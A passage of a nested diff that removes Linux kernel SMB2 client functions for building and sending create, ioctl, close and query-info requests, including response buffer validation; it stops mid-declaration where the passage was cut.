+-SMB2_open_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-	       struct smb_rqst *rqst, __u8 *oplock,
+-	       struct cifs_open_parms *oparms, __le16 *path)
+-{
+-	struct smb2_create_req *req;
+-	unsigned int n_iov = 2;
+-	__u32 file_attributes = 0;
+-	int copy_size;
+-	int uni_path_len;
+-	unsigned int total_len;
+-	struct kvec *iov = rqst->rq_iov;
+-	__le16 *copy_path;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	iov[0].iov_base = (char *)req;
+-	/* -1 since last byte is buf[0] which is sent below (path) */
+-	iov[0].iov_len = total_len - 1;
+-
+-	if (oparms->create_options & CREATE_OPTION_READONLY)
+-		file_attributes |= ATTR_READONLY;
+-	if (oparms->create_options & CREATE_OPTION_SPECIAL)
+-		file_attributes |= ATTR_SYSTEM;
+-
+-	req->ImpersonationLevel = IL_IMPERSONATION;
+-	req->DesiredAccess = cpu_to_le32(oparms->desired_access);
+-	/* File attributes ignored on open (used in create though) */
+-	req->FileAttributes = cpu_to_le32(file_attributes);
+-	req->ShareAccess = FILE_SHARE_ALL_LE;
+-
+-	req->CreateDisposition = cpu_to_le32(oparms->disposition);
+-	req->CreateOptions = cpu_to_le32(oparms->create_options & CREATE_OPTIONS_MASK);
+-	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
+-
+-	/* [MS-SMB2] 2.2.13 NameOffset:
+-	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
+-	 * the SMB2 header, the file name includes a prefix that will
+-	 * be processed during DFS name normalization as specified in
+-	 * section 3.3.5.9. Otherwise, the file name is relative to
+-	 * the share that is identified by the TreeId in the SMB2
+-	 * header.
+-	 */
+-	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
+-		int name_len;
+-
+-		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
+-		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
+-						 &name_len,
+-						 tcon->tree_name, path);
+-		if (rc)
+-			return rc;
+-		req->NameLength = cpu_to_le16(name_len * 2);
+-		uni_path_len = copy_size;
+-		path = copy_path;
+-	} else {
+-		uni_path_len = (2 * UniStrnlen((wchar_t *)path, PATH_MAX)) + 2;
+-		/* MUST set path len (NameLength) to 0 when opening the root of the share */
+-		req->NameLength = cpu_to_le16(uni_path_len - 2);
+-		copy_size = round_up(uni_path_len, 8);
+-		copy_path = kzalloc(copy_size, GFP_KERNEL);
+-		if (!copy_path)
+-			return -ENOMEM;
+-		memcpy((char *)copy_path, (const char *)path,
+-		       uni_path_len);
+-		uni_path_len = copy_size;
+-		path = copy_path;
+-	}
+-
+-	iov[1].iov_len = uni_path_len;
+-	iov[1].iov_base = path;
+-
+-	if ((!server->oplocks) || (tcon->no_lease))
+-		*oplock = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_LEASING) ||
+-	    *oplock == SMB2_OPLOCK_LEVEL_NONE)
+-		req->RequestedOplockLevel = *oplock;
+-	else if (!(server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) &&
+-		  (oparms->create_options & CREATE_NOT_FILE))
+-		req->RequestedOplockLevel = *oplock; /* no srv lease support */
+-	else {
+-		rc = add_lease_context(server, iov, &n_iov,
+-				       oparms->fid->lease_key, oplock);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (*oplock == SMB2_OPLOCK_LEVEL_BATCH) {
+-		/* need to set Next field of lease context if we request it */
+-		if (server->capabilities & SMB2_GLOBAL_CAP_LEASING) {
+-			struct create_context *ccontext =
+-			    (struct create_context *)iov[n_iov-1].iov_base;
+-			ccontext->Next =
+-				cpu_to_le32(server->vals->create_lease_size);
+-		}
+-
+-		rc = add_durable_context(iov, &n_iov, oparms,
+-					tcon->use_persistent);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (tcon->posix_extensions) {
+-		if (n_iov > 2) {
+-			struct create_context *ccontext =
+-			    (struct create_context *)iov[n_iov-1].iov_base;
+-			ccontext->Next =
+-				cpu_to_le32(iov[n_iov-1].iov_len);
+-		}
+-
+-		rc = add_posix_context(iov, &n_iov, oparms->mode);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (tcon->snapshot_time) {
+-		cifs_dbg(FYI, "adding snapshot context\n");
+-		if (n_iov > 2) {
+-			struct create_context *ccontext =
+-			    (struct create_context *)iov[n_iov-1].iov_base;
+-			ccontext->Next =
+-				cpu_to_le32(iov[n_iov-1].iov_len);
+-		}
+-
+-		rc = add_twarp_context(iov, &n_iov, tcon->snapshot_time);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if ((oparms->disposition != FILE_OPEN) && (oparms->cifs_sb)) {
+-		bool set_mode;
+-		bool set_owner;
+-
+-		if ((oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) &&
+-		    (oparms->mode != ACL_NO_MODE))
+-			set_mode = true;
+-		else {
+-			set_mode = false;
+-			oparms->mode = ACL_NO_MODE;
+-		}
+-
+-		if (oparms->cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
+-			set_owner = true;
+-		else
+-			set_owner = false;
+-
+-		if (set_owner | set_mode) {
+-			if (n_iov > 2) {
+-				struct create_context *ccontext =
+-				    (struct create_context *)iov[n_iov-1].iov_base;
+-				ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
+-			}
+-
+-			cifs_dbg(FYI, "add sd with mode 0x%x\n", oparms->mode);
+-			rc = add_sd_context(iov, &n_iov, oparms->mode, set_owner);
+-			if (rc)
+-				return rc;
+-		}
+-	}
+-
+-	if (n_iov > 2) {
+-		struct create_context *ccontext =
+-			(struct create_context *)iov[n_iov-1].iov_base;
+-		ccontext->Next = cpu_to_le32(iov[n_iov-1].iov_len);
+-	}
+-	add_query_id_context(iov, &n_iov);
+-
+-	rqst->rq_nvec = n_iov;
+-	return 0;
+-}
+-
+-/* rq_iov[0] is the request and is released by cifs_small_buf_release().
+- * All other vectors are freed by kfree().
+- */
+-void
+-SMB2_open_free(struct smb_rqst *rqst)
+-{
+-	int i;
+-
+-	if (rqst && rqst->rq_iov) {
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base);
+-		for (i = 1; i < rqst->rq_nvec; i++)
+-			if (rqst->rq_iov[i].iov_base != smb2_padding)
+-				kfree(rqst->rq_iov[i].iov_base);
+-	}
+-}
+-
+-int
+-SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+-	  __u8 *oplock, struct smb2_file_all_info *buf,
+-	  struct create_posix_rsp *posix,
+-	  struct kvec *err_iov, int *buftype)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_create_rsp *rsp = NULL;
+-	struct cifs_tcon *tcon = oparms->tcon;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct kvec iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int rc = 0;
+-	int flags = 0;
+-
+-	cifs_dbg(FYI, "create/open\n");
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst, oplock, oparms, path);
+-	if (rc)
+-		goto creat_exit;
+-
+-	trace_smb3_open_enter(xid, tcon->tid, tcon->ses->Suid, oparms->path,
+-		oparms->create_options, oparms->desired_access);
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags,
+-			    &rsp_iov);
+-	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
+-		if (err_iov && rsp) {
+-			*err_iov = rsp_iov;
+-			*buftype = resp_buftype;
+-			resp_buftype = CIFS_NO_BUFFER;
+-			rsp = NULL;
+-		}
+-		trace_smb3_open_err(xid, tcon->tid, ses->Suid,
+-				    oparms->create_options, oparms->desired_access, rc);
+-		if (rc == -EREMCHG) {
+-			pr_warn_once("server share %s deleted\n",
+-				     tcon->tree_name);
+-			tcon->need_reconnect = true;
+-		}
+-		goto creat_exit;
+-	} else if (rsp == NULL) /* unlikely to happen, but safer to check */
+-		goto creat_exit;
+-	else
+-		trace_smb3_open_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
+-				     oparms->create_options, oparms->desired_access);
+-
+-	atomic_inc(&tcon->num_remote_opens);
+-	oparms->fid->persistent_fid = rsp->PersistentFileId;
+-	oparms->fid->volatile_fid = rsp->VolatileFileId;
+-	oparms->fid->access = oparms->desired_access;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	oparms->fid->mid = le64_to_cpu(rsp->hdr.MessageId);
+-#endif /* CIFS_DEBUG2 */
+-
+-	if (buf) {
+-		buf->CreationTime = rsp->CreationTime;
+-		buf->LastAccessTime = rsp->LastAccessTime;
+-		buf->LastWriteTime = rsp->LastWriteTime;
+-		buf->ChangeTime = rsp->ChangeTime;
+-		buf->AllocationSize = rsp->AllocationSize;
+-		buf->EndOfFile = rsp->EndofFile;
+-		buf->Attributes = rsp->FileAttributes;
+-		buf->NumberOfLinks = cpu_to_le32(1);
+-		buf->DeletePending = 0;
+-	}
+-
+-
+-	smb2_parse_contexts(server, rsp, &oparms->fid->epoch,
+-			    oparms->fid->lease_key, oplock, buf, posix);
+-creat_exit:
+-	SMB2_open_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int
+-SMB2_ioctl_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		struct smb_rqst *rqst,
+-		u64 persistent_fid, u64 volatile_fid, u32 opcode,
+-		char *in_data, u32 indatalen,
+-		__u32 max_response_size)
+-{
+-	struct smb2_ioctl_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-	char *in_data_buf;
+-
+-	rc = smb2_ioctl_req_init(opcode, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (indatalen) {
+-		/*
+-		 * indatalen is usually small (a couple of bytes at most), so
+-		 * just allocate through the generic pool
+-		 */
+-		in_data_buf = kmemdup(in_data, indatalen, GFP_NOFS);
+-		if (!in_data_buf) {
+-			cifs_small_buf_release(req);
+-			return -ENOMEM;
+-		}
+-	}
+-
+-	req->CtlCode = cpu_to_le32(opcode);
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	iov[0].iov_base = (char *)req;
+-	/*
+-	 * If there is no input data, the size of the ioctl struct in the
+-	 * protocol spec still includes a 1 byte data buffer,
+-	 * but if input data is passed to the ioctl, we do not
+-	 * want to double count this, so we do not send
+-	 * the dummy one byte of data in iovec[0] if sending
+-	 * input data (in iovec[1]).
+-	 */
+-	if (indatalen) {
+-		req->InputCount = cpu_to_le32(indatalen);
+-		/* do not set InputOffset if no input data */
+-		req->InputOffset =
+-		       cpu_to_le32(offsetof(struct smb2_ioctl_req, Buffer));
+-		rqst->rq_nvec = 2;
+-		iov[0].iov_len = total_len - 1;
+-		iov[1].iov_base = in_data_buf;
+-		iov[1].iov_len = indatalen;
+-	} else {
+-		rqst->rq_nvec = 1;
+-		iov[0].iov_len = total_len;
+-	}
+-
+-	req->OutputOffset = 0;
+-	req->OutputCount = 0; /* MBZ */
+-
+-	/*
+-	 * In most cases max_response_size is set to 16K (CIFSMaxBufSize).
+-	 * We could increase the default MaxOutputResponse, but that could
+-	 * require more credits. Windows typically sets this smaller, but for
+-	 * some ioctls it may be useful to allow the server to send more. There
+-	 * is no point limiting what the server can send as long as it fits in
+-	 * one credit. We cannot handle more than CIFS_MAX_BUF_SIZE yet, but
+-	 * may want to increase this limit in the future.
+-	 * Note that for snapshot queries, servers like Azure expect the first
+-	 * query to be minimal size (and just used to get the number/size of
+-	 * previous versions), so the response size must be specified as
+-	 * EXACTLY sizeof(struct snapshot_array), which is 16 when rounded up
+-	 * to a multiple of eight bytes. Currently that is the only case where
+-	 * we set the max response size smaller.
+-	 */
+-	req->MaxOutputResponse = cpu_to_le32(max_response_size);
+-	req->hdr.CreditCharge =
+-		cpu_to_le16(DIV_ROUND_UP(max(indatalen, max_response_size),
+-					 SMB2_MAX_BUFFER_SIZE));
+-	/* always an FSCTL (for now) */
+-	req->Flags = cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL);
+-
+-	/* validate negotiate request must be signed - see MS-SMB2 3.2.5.5 */
+-	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO)
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-
+-	return 0;
+-}
+-
+-void
+-SMB2_ioctl_free(struct smb_rqst *rqst)
+-{
+-	int i;
+-	if (rqst && rqst->rq_iov) {
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-		for (i = 1; i < rqst->rq_nvec; i++)
+-			if (rqst->rq_iov[i].iov_base != smb2_padding)
+-				kfree(rqst->rq_iov[i].iov_base);
+-	}
+-}
+-
+-
+-/*
+- *	SMB2 IOCTL is used for both IOCTLs and FSCTLs
+- */
+-int
+-SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+-	   u64 volatile_fid, u32 opcode, char *in_data, u32 indatalen,
+-	   u32 max_out_data_len, char **out_data,
+-	   u32 *plen /* returned data len */)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_ioctl_rsp *rsp = NULL;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct kvec iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int rc = 0;
+-	int flags = 0;
+-
+-	cifs_dbg(FYI, "SMB2 IOCTL\n");
+-
+-	if (out_data != NULL)
+-		*out_data = NULL;
+-
+-	/* zero out returned data len, in case of error */
+-	if (plen)
+-		*plen = 0;
+-
+-	if (!tcon)
+-		return -EIO;
+-
+-	ses = tcon->ses;
+-	if (!ses)
+-		return -EIO;
+-
+-	server = cifs_pick_channel(ses);
+-	if (!server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-	rc = SMB2_ioctl_init(tcon, server,
+-			     &rqst, persistent_fid, volatile_fid, opcode,
+-			     in_data, indatalen, max_out_data_len);
+-	if (rc)
+-		goto ioctl_exit;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags,
+-			    &rsp_iov);
+-	rsp = (struct smb2_ioctl_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0)
+-		trace_smb3_fsctl_err(xid, persistent_fid, tcon->tid,
+-				ses->Suid, 0, opcode, rc);
+-
+-	if ((rc != 0) && (rc != -EINVAL) && (rc != -E2BIG)) {
+-		cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
+-		goto ioctl_exit;
+-	} else if (rc == -EINVAL) {
+-		if ((opcode != FSCTL_SRV_COPYCHUNK_WRITE) &&
+-		    (opcode != FSCTL_SRV_COPYCHUNK)) {
+-			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
+-			goto ioctl_exit;
+-		}
+-	} else if (rc == -E2BIG) {
+-		if (opcode != FSCTL_QUERY_ALLOCATED_RANGES) {
+-			cifs_stats_fail_inc(tcon, SMB2_IOCTL_HE);
+-			goto ioctl_exit;
+-		}
+-	}
+-
+-	/* check if caller wants to look at return data or just return rc */
+-	if ((plen == NULL) || (out_data == NULL))
+-		goto ioctl_exit;
+-
+-	/*
+-	 * Although it is unlikely for rsp to be null with rc not set,
+-	 * adding the check below is slightly safer long term (and quiets a
+-	 * Coverity warning)
+-	 */
+-	if (rsp == NULL) {
+-		rc = -EIO;
+-		goto ioctl_exit;
+-	}
+-
+-	*plen = le32_to_cpu(rsp->OutputCount);
+-
+-	/* We check for obvious errors in the output buffer length and offset */
+-	if (*plen == 0)
+-		goto ioctl_exit; /* server returned no data */
+-	else if (*plen > rsp_iov.iov_len || *plen > 0xFF00) {
+-		cifs_tcon_dbg(VFS, "srv returned invalid ioctl length: %d\n", *plen);
+-		*plen = 0;
+-		rc = -EIO;
+-		goto ioctl_exit;
+-	}
+-
+-	if (rsp_iov.iov_len - *plen < le32_to_cpu(rsp->OutputOffset)) {
+-		cifs_tcon_dbg(VFS, "Malformed ioctl resp: len %d offset %d\n", *plen,
+-			le32_to_cpu(rsp->OutputOffset));
+-		*plen = 0;
+-		rc = -EIO;
+-		goto ioctl_exit;
+-	}
+-
+-	*out_data = kmemdup((char *)rsp + le32_to_cpu(rsp->OutputOffset),
+-			    *plen, GFP_KERNEL);
+-	if (*out_data == NULL) {
+-		rc = -ENOMEM;
+-		goto ioctl_exit;
+-	}
+-
+-ioctl_exit:
+-	SMB2_ioctl_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-/*
+- *   Individual callers to ioctl worker function follow
+- */
+-
+-int
+-SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid)
+-{
+-	int rc;
+-	struct  compress_ioctl fsctl_input;
+-	char *ret_data = NULL;
+-
+-	fsctl_input.CompressionState =
+-			cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
+-
+-	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
+-			FSCTL_SET_COMPRESSION,
+-			(char *)&fsctl_input /* data input */,
+-			2 /* in data len */, CIFSMaxBufSize /* max out data */,
+-			&ret_data /* out data */, NULL);
+-
+-	cifs_dbg(FYI, "set compression rc %d\n", rc);
+-
+-	return rc;
+-}
+-
+-int
+-SMB2_close_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		struct smb_rqst *rqst,
+-		u64 persistent_fid, u64 volatile_fid, bool query_attrs)
+-{
+-	struct smb2_close_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_CLOSE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	if (query_attrs)
+-		req->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
+-	else
+-		req->Flags = 0;
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	return 0;
+-}
+-
+-void
+-SMB2_close_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-int
+-__SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-	     u64 persistent_fid, u64 volatile_fid,
+-	     struct smb2_file_network_open_info *pbuf)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_close_rsp *rsp = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int rc = 0;
+-	int flags = 0;
+-	bool query_attrs = false;
+-
+-	cifs_dbg(FYI, "Close\n");
+-
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	/* check if we need to ask the server to return timestamps in the close response */
+-	if (pbuf)
+-		query_attrs = true;
+-
+-	trace_smb3_close_enter(xid, persistent_fid, tcon->tid, ses->Suid);
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst, persistent_fid, volatile_fid,
+-			     query_attrs);
+-	if (rc)
+-		goto close_exit;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_close_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_CLOSE_HE);
+-		trace_smb3_close_err(xid, persistent_fid, tcon->tid, ses->Suid,
+-				     rc);
+-		goto close_exit;
+-	} else {
+-		trace_smb3_close_done(xid, persistent_fid, tcon->tid,
+-				      ses->Suid);
+-		/*
+-		 * Note that we have to subtract 4 since struct network_open_info
+-		 * has a final 4 byte pad that the close response does not have.
+-		 */
+-		if (pbuf)
+-			memcpy(pbuf, (char *)&rsp->CreationTime, sizeof(*pbuf) - 4);
+-	}
+-
+-	atomic_dec(&tcon->num_remote_opens);
+-close_exit:
+-	SMB2_close_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-
+-	/* retry close in a worker thread if this one is interrupted */
+-	if (is_interrupt_error(rc)) {
+-		int tmp_rc;
+-
+-		tmp_rc = smb2_handle_cancelled_close(tcon, persistent_fid,
+-						     volatile_fid);
+-		if (tmp_rc)
+-			cifs_dbg(VFS, "handle cancelled close fid 0x%llx returned error %d\n",
+-				 persistent_fid, tmp_rc);
+-	}
+-	return rc;
+-}
+-
+-int
+-SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid)
+-{
+-	return __SMB2_close(xid, tcon, persistent_fid, volatile_fid, NULL);
+-}
+-
+-int
+-smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
+-		  struct kvec *iov, unsigned int min_buf_size)
+-{
+-	unsigned int smb_len = iov->iov_len;
+-	char *end_of_smb = smb_len + (char *)iov->iov_base;
+-	char *begin_of_buf = offset + (char *)iov->iov_base;
+-	char *end_of_buf = begin_of_buf + buffer_length;
+-
+-
+-	if (buffer_length < min_buf_size) {
+-		cifs_dbg(VFS, "buffer length %d smaller than minimum size %d\n",
+-			 buffer_length, min_buf_size);
+-		return -EINVAL;
+-	}
+-
+-	/* check if beyond RFC1001 maximum length */
+-	if ((smb_len > 0x7FFFFF) || (buffer_length > 0x7FFFFF)) {
+-		cifs_dbg(VFS, "buffer length %d or smb length %d too large\n",
+-			 buffer_length, smb_len);
+-		return -EINVAL;
+-	}
+-
+-	if ((begin_of_buf > end_of_smb) || (end_of_buf > end_of_smb)) {
+-		cifs_dbg(VFS, "Invalid server response, bad offset to data\n");
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-/*
+- * If SMB buffer fields are valid, copy into temporary buffer to hold result.
+- * Caller must free buffer.
+- */
+-int
+-smb2_validate_and_copy_iov(unsigned int offset, unsigned int buffer_length,
+-			   struct kvec *iov, unsigned int minbufsize,
+-			   char *data)
+-{
+-	char *begin_of_buf = offset + (char *)iov->iov_base;
+-	int rc;
+-
+-	if (!data)
+-		return -EINVAL;
+-
+-	rc = smb2_validate_iov(offset, buffer_length, iov, minbufsize);
+-	if (rc)
+-		return rc;
+-
+-	memcpy(data, begin_of_buf, minbufsize);
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		     struct smb_rqst *rqst,
+-		     u64 persistent_fid, u64 volatile_fid,
+-		     u8 info_class, u8 info_type, u32 additional_info,
+-		     size_t output_len, size_t input_len, void *input)
+-{
+-	struct smb2_query_info_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->InfoType = info_type;
+-	req->FileInfoClass = info_class;
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	req->AdditionalInformation = cpu_to_le32(additional_info);
+-
+-	req->OutputBufferLength = cpu_to_le32(output_len);
+-	if (input_len) {
+-		req->InputBufferLength = cpu_to_le32(input_len);
+-		/* total_len for smb query request is never close to le16 max */
+-		req->InputBufferOffset = cpu_to_le16(total_len - 1);
+-		memcpy(req->Buffer, input, input_len);
+-	}
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1 + input_len;
+-	return 0;
+-}
+-
+-void
+-SMB2_query_info_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-static int
+-query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	   u64 persistent_fid, u64 volatile_fid, u8 info_class, u8 info_type,
+-	   u32 additional_info, size_t output_len, size_t min_len, void **data,
+-		u32 *dlen)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server;
+-	int flags = 0;
+-	bool allocated = false;
+-
+-	cifs_dbg(FYI, "Query Info\n");
+-
+-	if (!ses)
+-		return -EIO;
+-	server = cifs_pick_channel(ses);
+-	if (!server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = SMB2_query_info_init(tcon, server,
+-				  &rqst, persistent_fid, volatile_fid,
+-				  info_class, info_type, additional_info,
+-				  output_len, 0, NULL);
+-	if (rc)
+-		goto qinf_exit;
+-
+-	trace_smb3_query_info_enter(xid, persistent_fid, tcon->tid,
+-				    ses->Suid, info_class, (__u32)info_type);
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		trace_smb3_query_info_err(xid, persistent_fid, tcon->tid,
+-				ses->Suid, info_class, (__u32)info_type, rc);
+-		goto qinf_exit;
+-	}
+-
+-	trace_smb3_query_info_done(xid, persistent_fid, tcon->tid,
+-				ses->Suid, info_class, (__u32)info_type);
+-
+-	if (dlen) {
+-		*dlen = le32_to_cpu(rsp->OutputBufferLength);
+-		if (!*data) {
+-			*data = kmalloc(*dlen, GFP_KERNEL);
+-			if (!*data) {
+-				cifs_tcon_dbg(VFS,
+-					"Error %d allocating memory for acl\n",
+-					rc);
+-				*dlen = 0;
+-				rc = -ENOMEM;
+-				goto qinf_exit;
+-			}
+-			allocated = true;
+-		}
+-	}
+-
+-	rc = smb2_validate_and_copy_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-					le32_to_cpu(rsp->OutputBufferLength),
+-					&rsp_iov, dlen ? *dlen : min_len, *data);
+-	if (rc && allocated) {
+-		kfree(*data);
+-		*data = NULL;
+-		*dlen = 0;
+-	}
+-
+-qinf_exit:
+-	SMB2_query_info_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	u64 persistent_fid, u64 volatile_fid, struct smb2_file_all_info *data)
+-{
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  FILE_ALL_INFORMATION, SMB2_O_INFO_FILE, 0,
+-			  sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
+-			  sizeof(struct smb2_file_all_info), (void **)&data,
+-			  NULL);
+-}
+-
+-#if 0
+-/* currently unused, as now we are doing compounding instead (see smb311_posix_query_path_info) */
+-int
+-SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen)
+-{
+-	size_t output_len = sizeof(struct smb311_posix_qinfo *) +
+-			(sizeof(struct cifs_sid) * 2) + (PATH_MAX * 2);
+-	*plen = 0;
+-
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  SMB_FIND_FILE_POSIX_INFO, SMB2_O_INFO_FILE, 0,
+-			  output_len, sizeof(struct smb311_posix_qinfo), (void **)&data, plen);
+-	/* Note caller must free "data" (passed in above). It may be allocated in query_info call */
+-}
+-#endif
+-
+-int
+-SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-	       u64 persistent_fid, u64 volatile_fid,
+-	       void **data, u32 *plen, u32 extra_info)
+-{
+-	__u32 additional_info = OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
+-				extra_info;
+-	*plen = 0;
+-
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  0, SMB2_O_INFO_SECURITY, additional_info,
+-			  SMB2_MAX_BUFFER_SIZE, MIN_SEC_DESC_LEN, data, plen);
+-}
+-
+-int
